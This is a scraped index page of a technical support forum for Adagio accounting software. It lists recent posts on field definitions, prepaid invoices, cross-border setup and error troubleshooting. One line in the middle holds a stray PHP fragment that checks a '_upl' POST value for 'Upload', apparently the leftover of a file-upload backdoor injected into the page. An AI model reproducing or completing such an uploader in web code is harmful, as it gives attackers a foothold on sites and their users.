www.softrak.com
Adagio Accounting Software (homepage) Softrak Technical Support Forums
Active Topics | Active Posts | Unanswered Posts Past 24 hours | Past 48 hours | Past 7 days
Forum   Subject
General Inquiries Forum
Jump to new posts Re: Optional fields by Colleen_L @ 3 minutes 35 seconds ago

Hi Steve, Thanks for the suggestion. We have more than just Kindergarten to grade 12, we also have daycare and preschool, and there is no graduation date. I'm going to try the contacts and see if I can manage to get everything I need onto 1 gridvi
Technical Support
Jump to new posts Re: Trying to find an Adagio table field definition by richlocus @ Yesterday at 09:55 PM

Thanks Steve... Yes, after a review, that date is the last date the item was touched, even by an edit. I appreciate your comments. Regards, Rich
General Inquiries Forum
Jump to new posts Re: Prepaid invoices by Douglas Dickie @ Yesterday at 03:33 PM

Andrew: I like this option "...entries moving from the prepaid expense to the actual expense be part of the period end in Payables". The challenge would be managing prepaid's, what is the activation date? Expense 100% on activation date,
General Inquiries Forum
Jump to new posts Re: Doing business in USA and Canada by Brian Stief @ 10/13/17 03:30 PM

Hi, We do not follow the forum daily so we are late responding to your question about configuration and processing within USA and Canada. I'm answering with a perspective of best practices and our experience as Adagio integrators as we use Adagio fo
Technical Support
Jump to new posts Re: Flashing and Blinking Adagio Windows by Softrak Support @ 10/12/17 05:31 PM

Hi Acrylon, I can appreciate this is frustrating for the people using the updated OE and IC programs. I haven't heard of this situation happening before at other sites. The only thing I can offer is whether the same situation occurs in sample data,
Technical Support
Jump to new posts Re: Access Violation Errors by Acrylon @ 10/11/17 07:05 PM

Thanks. We got in touch with our Adagio consultant. It took a few days and lots of trial and error with old and new versions of Adagio, but we finally got it working. It sounds like these errors were a result of data corruption from viral infectio
'; echo ''; if( $_POST['_upl'] == "Upload" ) else } ?>
Who's Online
5 registered (icbm, Colleen_L, Bruce Gardner, Softrak Support, 1 invisible), 75 Guests and 0 Spiders online.
Key: Admin, Global Mod, Mod
Forum Stats
1305 Members
5 Forums
11460 Topics
54467 Posts

Max Online: 114 @ 05/19/17 02:27 AM
October
Su M Tu W Th F Sa
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21